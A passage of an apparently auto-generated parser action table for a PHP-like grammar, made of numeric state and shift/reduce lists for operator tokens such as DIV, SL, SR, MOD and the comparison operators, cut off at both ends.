459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,144,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,144,-190,-429,-430,144,144,144,144,144,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,144,144,144,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,144,144,144,144,144,144,-348,-363,-227,-228,-349,-364,-428,144,144,-443,-443,-244,-248,-250,144,144,144,144,144,144,144,144,144,144,144,144,-300,-301,144,144,-304,144,144,144,144,144,144,144,144,-313,-314,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,144,-183,-197,-188,-253,144,144,-345,144,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,144,144,-209,144,-429,582,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,144,-238,144,144,144,-353,144,-234,-229,-189,-443,-230,-252,144,144,-333,-336,-337,-346,-443,144,-361,144,144,-218,-235,-236,-240,-392,-393,582,-380,-390,582,-402,-249,144,144,144,-196,144,-191,-194,144,-205,-223,-210,-231,-232,-211,582,582,582,582,582,582,582,582,582,582,582,-414,-415,582,582,-418,582,582,582,582,582,582,582,582,-427,-381,-391,-395,-365,-366,-386,-220,144,-231,-193,-232,144,144,-222,144,-212,-213,-214,-215,-394,582,-402,582,-246,-247,-195,-443,144,-224,-216,-217,582,144,-271,582,144,582,]),'DIV':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,
235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,145,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,145,-190,-429,-430,145,145,145,145,145,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,145,145,145,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,145,145,145,145,145,145,-348,-363,-227,-228,-349,-364,-428,145,145,-443,-443,-244,-248,-250,145,145,145,145,145,145,145,145,145,145,145,145,-300,-301,145,145,-304,145,145,145,145,145,145,145,145,-313,-314,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,145,-183,-197,-188,-253,145,145,-345,145,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,145,145,-209,145,-429,583,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,145,-238,145,145,145,-353,145,-234,-229,-189,-443,-230,-252,145,145,-333,-336,-337,-346,-443,145,-361,145,145,-218,-235,-236,-240,-392,-393,583,-380,-390,583,-402,-249,145,145,145,-196,145,-191,-194,145,-205,-223,-210,-231,-232,-211,583,583,583,583,583,583,583,583,583,583,583,-414,-415,583,583,-418,583,583,583,583,583,583,583,583,-427,-381
,-391,-395,-365,-366,-386,-220,145,-231,-193,-232,145,145,-222,145,-212,-213,-214,-215,-394,583,-402,583,-246,-247,-195,-443,145,-224,-216,-217,583,145,-271,583,145,583,]),'SL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,146,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,146,-190,-429,-430,146,146,146,146,146,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,146,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,146,146,146,146,146,146,-348,-363,-227,-228,-349,-364,-428,146,146,-443,-443,-244,-248,-250,146,146,146,146,146,146,146,146,146,-297,-298,-299,-300,-301,-302,-303,-304,146,146,146,146,146,146,146,146,-313,-314,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,146,-183,-197,-188,-253,146,146,-345,146,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,146,146,-209,146,-429,584,-40
2,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,146,-238,146,146,146,-353,146,-234,-229,-189,-443,-230,-252,146,146,-333,-336,-337,-346,-443,146,-361,146,146,-218,-235,-236,-240,-392,-393,584,-380,-390,584,-402,-249,146,146,146,-196,146,-191,-194,146,-205,-223,-210,-231,-232,-211,584,584,584,584,584,584,584,584,-411,-412,-413,-414,-415,-416,-417,-418,584,584,584,584,584,584,584,584,-427,-381,-391,-395,-365,-366,-386,-220,146,-231,-193,-232,146,146,-222,146,-212,-213,-214,-215,-394,584,-402,584,-246,-247,-195,-443,146,-224,-216,-217,584,146,-271,584,146,584,]),'SR':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,147,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,147,-190,-429,-430,147,147,147,147,147,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,147,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-
330,-331,147,147,147,147,147,147,-348,-363,-227,-228,-349,-364,-428,147,147,-443,-443,-244,-248,-250,147,147,147,147,147,147,147,147,147,-297,-298,-299,-300,-301,-302,-303,-304,147,147,147,147,147,147,147,147,-313,-314,147,147,147,147,147,147,147,147,147,147,147,147,147,147,147,147,147,-183,-197,-188,-253,147,147,-345,147,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,147,147,-209,147,-429,585,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,147,-238,147,147,147,-353,147,-234,-229,-189,-443,-230,-252,147,147,-333,-336,-337,-346,-443,147,-361,147,147,-218,-235,-236,-240,-392,-393,585,-380,-390,585,-402,-249,147,147,147,-196,147,-191,-194,147,-205,-223,-210,-231,-232,-211,585,585,585,585,585,585,585,585,-411,-412,-413,-414,-415,-416,-417,-418,585,585,585,585,585,585,585,585,-427,-381,-391,-395,-365,-366,-386,-220,147,-231,-193,-232,147,147,-222,147,-212,-213,-214,-215,-394,585,-402,585,-246,-247,-195,-443,147,-224,-216,-217,585,147,-271,585,147,585,]),'MOD':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,80
4,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,148,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,148,-190,-429,-430,148,148,148,148,148,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,148,148,148,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,148,148,148,148,148,148,-348,-363,-227,-228,-349,-364,-428,148,148,-443,-443,-244,-248,-250,148,148,148,148,148,148,148,148,148,148,148,148,-300,-301,148,148,-304,148,148,148,148,148,148,148,148,-313,-314,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,148,-183,-197,-188,-253,148,148,-345,148,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,148,148,-209,148,-429,586,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,148,-238,148,148,148,-353,148,-234,-229,-189,-443,-230,-252,148,148,-333,-336,-337,-346,-443,148,-361,148,148,-218,-235,-236,-240,-392,-393,586,-380,-390,586,-402,-249,148,148,148,-196,148,-191,-194,148,-205,-223,-210,-231,-232,-211,586,586,586,586,586,586,586,586,586,586,586,-414,-415,586,586,-418,586,586,586,586,586,586,586,586,-427,-381,-391,-395,-365,-366,-386,-220,148,-231,-193,-232,148,148,-222,148,-212,-213,-214,-215,-394,586,-402,586,-246,-247,-195,-443,148,-224,-216,-217,586,148,-271,586,148,586,]),'IS_IDENTICAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,4
62,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,149,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,149,-190,-429,-430,149,149,149,149,149,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,149,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,149,149,149,149,149,149,-348,-363,-227,-228,-349,-364,-428,149,149,-443,-443,-244,-248,-250,149,149,149,149,149,149,149,149,149,-297,-298,-299,-300,-301,-302,-303,-304,None,None,None,None,-309,-310,-311,-312,-313,-314,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,149,-183,-197,-188,-253,149,149,-345,149,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,149,149,-209,149,-429,587,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,149,-238,149,149,149,-353,149,-234,-229,-189,-443,-230,-252,149,149,-333,-336,-337,-346,-443,149,-361,149,149,-218,-235,-236,-240,-392,-393,587,-380,-390,587,-402,-249,149,149,149,-196,149,-191,-194,149,-205,-223,-210,-231,-232,-211,587,587,587,587,587,587,587,587,-411,-412,-413,-414,-415,-416,-417,-418,None,None,None,None,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,149,-231,-193,-232,149,149,-222,149,-212,-213,-214,-215,-394,587,-402,587,-246,-247,-195,-443,149,-224,-216,-217,587,149,-271,587,149,587,]),'IS_NOT_IDENTICAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,
216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,150,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,150,-190,-429,-430,150,150,150,150,150,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,150,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,150,150,150,150,150,150,-348,-363,-227,-228,-349,-364,-428,150,150,-443,-443,-244,-248,-250,150,150,150,150,150,150,150,150,150,-297,-298,-299,-300,-301,-302,-303,-304,None,None,None,None,-309,-310,-311,-312,-313,-314,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,150,-183,-197,-188,-253,150,150,-345,150,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,150,150,-209,150,-429,588,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,150,-238,150,150,150,-353,150,-234,-229,-189,-443,-230,-252,150,150,-333,-336,-337,-346,-443,150,-361,150,150,-218,-235,-236,-240,-392,-393,588,-380,-390,588,-402,-249,150,150,150,-196,150,-191,-194,150,-205,-223,-210,-231,-232,-211,588,588,588,588,588,588,588,588,-411,-412,-413,-414,-415,-416
,-417,-418,None,None,None,None,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,150,-231,-193,-232,150,150,-222,150,-212,-213,-214,-215,-394,588,-402,588,-246,-247,-195,-443,150,-224,-216,-217,588,150,-271,588,150,588,]),'IS_EQUAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,151,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,151,-190,-429,-430,151,151,151,151,151,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,151,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,151,151,151,151,151,151,-348,-363,-227,-228,-349,-364,-428,151,151,-443,-443,-244,-248,-250,151,151,151,151,151,151,151,151,151,-297,-298,-299,-300,-301,-302,-303,-304,None,None,None,None,-309,-310,-311,-312,-313,-314,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,151,-183,-197,-188,-253,151,151,-345,151,-443,
-352,-365,-385,-229,-366,-230,-357,-358,-219,151,151,-209,151,-429,589,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,151,-238,151,151,151,-353,151,-234,-229,-189,-443,-230,-252,151,151,-333,-336,-337,-346,-443,151,-361,151,151,-218,-235,-236,-240,-392,-393,589,-380,-390,589,-402,-249,151,151,151,-196,151,-191,-194,151,-205,-223,-210,-231,-232,-211,589,589,589,589,589,589,589,589,-411,-412,-413,-414,-415,-416,-417,-418,None,None,None,None,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,151,-231,-193,-232,151,151,-222,151,-212,-213,-214,-215,-394,589,-402,589,-246,-247,-195,-443,151,-224,-216,-217,589,151,-271,589,151,589,]),'IS_NOT_EQUAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,152,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,152,-190,-429,-430,152,152,152,152,152,-370,-323,-324,-443,-185,-18
6,-187,-192,-225,-228,-198,152,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,152,152,152,152,152,152,-348,-363,-227,-228,-349,-364,-428,152,152,-443,-443,-244,-248,-250,152,152,152,152,152,152,152,152,152,-297,-298,-299,-300,-301,-302,-303,-304,None,None,None,None,-309,-310,-311,-312,-313,-314,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,152,-183,-197,-188,-253,152,152,-345,152,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,152,152,-209,152,-429,590,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,152,-238,152,152,152,-353,152,-234,-229,-189,-443,-230,-252,152,152,-333,-336,-337,-346,-443,152,-361,152,152,-218,-235,-236,-240,-392,-393,590,-380,-390,590,-402,-249,152,152,152,-196,152,-191,-194,152,-205,-223,-210,-231,-232,-211,590,590,590,590,590,590,590,590,-411,-412,-413,-414,-415,-416,-417,-418,None,None,None,None,-423,-424,-425,-426,-427,-381,-391,-395,-365,-366,-386,-220,152,-231,-193,-232,152,152,-222,152,-212,-213,-214,-215,-394,590,-402,590,-246,-247,-195,-443,152,-224,-216,-217,590,152,-271,590,152,590,]),'IS_SMALLER':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717
,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,153,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,153,-190,-429,-430,153,153,153,153,153,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,153,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,153,153,153,153,153,153,-348,-363,-227,-228,-349,-364,-428,153,153,-443,-443,-244,-248,-250,153,153,153,153,153,153,153,153,153,-297,-298,-299,-300,-301,-302,-303,-304,153,153,153,153,None,None,None,None,-313,-314,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,153,-183,-197,-188,-253,153,153,-345,153,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,153,153,-209,153,-429,591,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,153,-238,153,153,153,-353,153,-234,-229,-189,-443,-230,-252,153,153,-333,-336,-337,-346,-443,153,-361,153,153,-218,-235,-236,-240,-392,-393,591,-380,-390,591,-402,-249,153,153,153,-196,153,-191,-194,153,-205,-223,-210,-231,-232,-211,591,591,591,591,591,591,591,591,-411,-412,-413,-414,-415,-416,-417,-418,591,591,591,591,None,None,None,None,-427,-381,-391,-395,-365,-366,-386,-220,153,-231,-193,-232,153,153,-222,153,-212,-213,-214,-215,-394,591,-402,591,-246,-247,-195,-443,153,-224,-216,-217,591,153,-271,591,153,591,]),'IS_SMALLER_OR_EQUAL':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,85,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379
,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,154,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,154,-190,-429,-430,154,154,154,154,154,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,154,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,154,154,154,154,154,154,-348,-363,-227,-228,-349,-364,-428,154,154,-443,-443,-244,-248,-250,154,154,154,154,154,154,154,154,154,-297,-298,-299,-300,-301,-302,-303,-304,154,154,154,154,None,None,None,None,-313,-314,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,154,-183,-197,-188,-253,154,154,-345,154,-443,-352,-365,-385,-229,-366,-230,-357,-358,-219,154,154,-209,154,-429,592,-402,-378,-379,-382,-383,-384,-389,-430,-184,-221,-243,-245,154,-238,154,154,154,-353,154,-234,-229,-189,-443,-230,-252,154,154,-333,-336,-337,-346,-443,154,-361,154,154,-218,-235,-236,-240,-392,-393,592,-380,-390,592,-402,-249,154,154,154,-196,154,-191,-194,154,-205,-223,-210,-231,-232,-211,592,592,592,592,592,592,592,592,-411,-412,-413,-414,-415,-416,-417,-418,592,592,592,592,None,None,None,None,-427,-381,-391,-395,-365,-366,-386,-220,154,-231,-193,-232,154,154,-222,154,-212,-213,-214,-215,-394,592,-402,592,-246,-247,-195,-443,154,-224,-216,-217,592,154,-271,592,154,592,]),'IS_GREATER':([12,17,35,39,43,44,67,73,74,75,77,78,79,80,82,83,84,8
5,88,89,90,91,92,93,94,95,96,97,100,101,104,106,107,109,111,116,117,165,167,169,178,181,187,203,204,206,207,208,209,212,213,214,216,223,224,225,226,227,228,234,235,236,237,238,239,240,241,242,243,247,248,249,250,252,253,259,269,271,273,278,279,283,299,300,301,302,303,305,306,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,337,342,343,344,374,376,377,378,379,380,381,382,383,384,385,386,388,390,392,402,414,415,416,417,418,419,426,427,428,430,431,433,434,437,439,440,445,450,452,453,454,458,459,461,462,463,464,467,478,480,481,482,483,484,486,494,497,511,524,525,527,529,530,531,536,538,539,544,546,547,548,549,552,553,558,561,562,563,564,565,595,596,597,598,600,606,607,618,619,623,625,673,674,675,676,677,685,686,695,698,701,702,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,732,736,737,738,743,745,789,791,792,794,795,798,800,801,802,804,805,807,808,809,810,817,818,854,856,873,900,902,903,904,905,919,926,936,945,],[-362,155,-429,-180,-251,-430,-344,-206,-350,-351,-354,-355,-356,-361,-342,-343,-207,-208,-367,-368,-369,-371,-372,-373,-374,-375,-376,-377,-225,-226,-228,-237,-239,155,-190,-429,-430,155,155,155,155,155,-370,-323,-324,-443,-185,-186,-187,-192,-225,-228,-198,155,-315,-316,-317,-318,-321,-228,-322,-325,-326,-327,-328,-329,-330,-331,155,155,155,155,155,155,-348,-363,-227,-228,-349,-364,-428,155,155,-443,-443,-244,-248,-250,155,155,155,155,155,155,155,155,155,-297,-298,-299,-300,-301,-302,-303,-304,155,155,155,155,N